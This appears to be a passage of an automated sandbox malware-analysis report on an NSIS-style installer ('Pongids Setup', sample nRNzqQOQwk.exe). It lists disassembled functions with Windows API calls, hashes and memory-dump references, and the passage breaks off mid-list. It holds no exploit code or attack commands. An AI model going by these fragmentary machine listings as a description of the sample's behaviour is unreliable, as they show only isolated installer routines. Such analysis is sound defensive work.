                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: @y
                                                                            • API String ID: 590372296-2793234042
                                                                            • Opcode ID: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                                            • Instruction ID: 669047f9f67e304dd712f5be3c8e464dbcc99e7ae4a165c688d328355b6db051
                                                                            • Opcode Fuzzy Hash: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                                            • Instruction Fuzzy Hash: 9DA16970900249BFEF119FA0DD89EAE7F79EB08354F00806AFA05B61A0C7795E50DF69
                                                                            Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040494E
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404959
                                                                            • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004049A3
                                                                            • LoadBitmapA.USER32(0000006E), ref: 004049B6
                                                                            • SetWindowLongA.USER32(?,000000FC,00404F2D), ref: 004049CF
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E3
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049F5
                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404A0B
                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A17
                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A29
                                                                            • DeleteObject.GDI32(00000000), ref: 00404A2C
                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A57
                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A63
                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AF8
                                                                            • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B23
                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B37
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404B66
                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B74
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B85
                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C82
                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CE7
                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404CFC
                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D20
                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D40
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404D55
                                                                            • GlobalFree.KERNEL32(?), ref: 00404D65
                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DDE
                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E87
                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E96
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EB6
                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F04
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F0F
                                                                            • ShowWindow.USER32(00000000), ref: 00404F16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                                            • Instruction ID: 10d6cb261f95093856db0383de4589f8155b4d68da151c8c89fd000e0678f767
                                                                            • Opcode Fuzzy Hash: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                                            • Instruction Fuzzy Hash: AB027CB0900209AFEB14DF64DC85AAE7BB9FB84314F10817AF610BA2E1D7789D51CF58
                                                                            Function 004043C3 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404412
                                                                            • SetWindowTextA.USER32(00000000,?), ref: 0040443C
                                                                            • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 004044ED
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004044F8
                                                                            • lstrcmpiA.KERNEL32(Call,0079E540), ref: 0040452A
                                                                            • lstrcatA.KERNEL32(?,Call), ref: 00404536
                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404548
                                                                              • Part of subcall function 0040557A: GetDlgItemTextA.USER32(?,?,00000400,0040457F), ref: 0040558D
                                                                              • Part of subcall function 0040600B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                                              • Part of subcall function 0040600B: CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                                              • Part of subcall function 0040600B: CharNextA.USER32(?,"C:\Users\user\Desktop\nRNzqQOQwk.exe",765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                                              • Part of subcall function 0040600B: CharPrevA.USER32(?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                                            • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404606
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404621
                                                                              • Part of subcall function 0040477A: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                                              • Part of subcall function 0040477A: wsprintfA.USER32 ref: 00404820
                                                                              • Part of subcall function 0040477A: SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: @y$A$C:\Users\user\slavelivets$Call
                                                                            • API String ID: 2624150263-2138057794
                                                                            • Opcode ID: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                                            • Instruction ID: b79cf5757fdebc40129ea8bf430174fd55c22843b8008fc959c2d10819856cf3
                                                                            • Opcode Fuzzy Hash: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                                            • Instruction Fuzzy Hash: A3A170B1900209ABDB11EFA5CC45BAF77B8EF85314F10843BF611B62D1E77C9A418B69
                                                                            Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                            Strings
                                                                            • C:\Users\user\slavelivets, xrefs: 0040218C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                            • String ID: C:\Users\user\slavelivets
                                                                            • API String ID: 123533781-1403250623
                                                                            • Opcode ID: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                            • Instruction ID: 3b959fe0d73b6f2ff8ba1a3dad26e84ad0429d5bc67268e837327fa781b0949d
                                                                            • Opcode Fuzzy Hash: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                            • Instruction Fuzzy Hash: 705116B5E00208BFCB00DFE4C988A9DBBB6EF48314B2445AAF515FB2D1DA799941CB54
                                                                            Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                                            • Instruction ID: 3ccff3199aeab2db1e2dd923352da36f4292fa18247536f83ce369c7762b159a
                                                                            • Opcode Fuzzy Hash: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                                            • Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
                                                                            Function 00403AB2 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AEE
                                                                            • ShowWindow.USER32(?), ref: 00403B0B
                                                                            • DestroyWindow.USER32 ref: 00403B1F
                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B3B
                                                                            • GetDlgItem.USER32(?,?), ref: 00403B5C
                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B70
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B77
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403C25
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403C2F
                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403C49
                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C9A
                                                                            • GetDlgItem.USER32(?,?), ref: 00403D40
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403D61
                                                                            • EnableWindow.USER32(?,?), ref: 00403D73
                                                                            • EnableWindow.USER32(?,?), ref: 00403D8E
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DA4
                                                                            • EnableMenuItem.USER32(00000000), ref: 00403DAB
                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DC3
                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DD6
                                                                            • lstrlenA.KERNEL32(0079E540,?,0079E540,Pongids Setup), ref: 00403DFF
                                                                            • SetWindowTextA.USER32(?,0079E540), ref: 00403E0E
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403F42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID: @y$Pongids Setup
                                                                            • API String ID: 184305955-1393332770
                                                                            • Opcode ID: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                                            • Instruction ID: 1a58b870ca21ce47ba752d56327be38b30dd2316994c96cb4837d6e7696a1104
                                                                            • Opcode Fuzzy Hash: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                                            • Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
                                                                            Function 004040CE Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404159
                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 0040416D
                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040418B
                                                                            • GetSysColor.USER32(?), ref: 0040419C
                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041AB
                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041BA
                                                                            • lstrlenA.KERNEL32(?), ref: 004041BD
                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041CC
                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041E1
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404243
                                                                            • SendMessageA.USER32(00000000), ref: 00404246
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404271
                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042B1
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004042C0
                                                                            • SetCursor.USER32(00000000), ref: 004042C9
                                                                            • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 004042DC
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004042E9
                                                                            • SetCursor.USER32(00000000), ref: 004042EC
                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404318
                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040432C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                            • String ID: Call$N$open
                                                                            • API String ID: 3615053054-2563687911
                                                                            • Opcode ID: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                            • Instruction ID: 601bc5fe35b3c5de407f3786c3433e5d67f1b6e9b87549a619d2750a8ed94523
                                                                            • Opcode Fuzzy Hash: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                                            • Instruction Fuzzy Hash: 6B61A5B1A40209BFEB109F61CC45F6A7B79FB84705F108026FB05BA2D1C7B8A951CF58
                                                                            Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextA.USER32(00000000,Pongids Setup,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
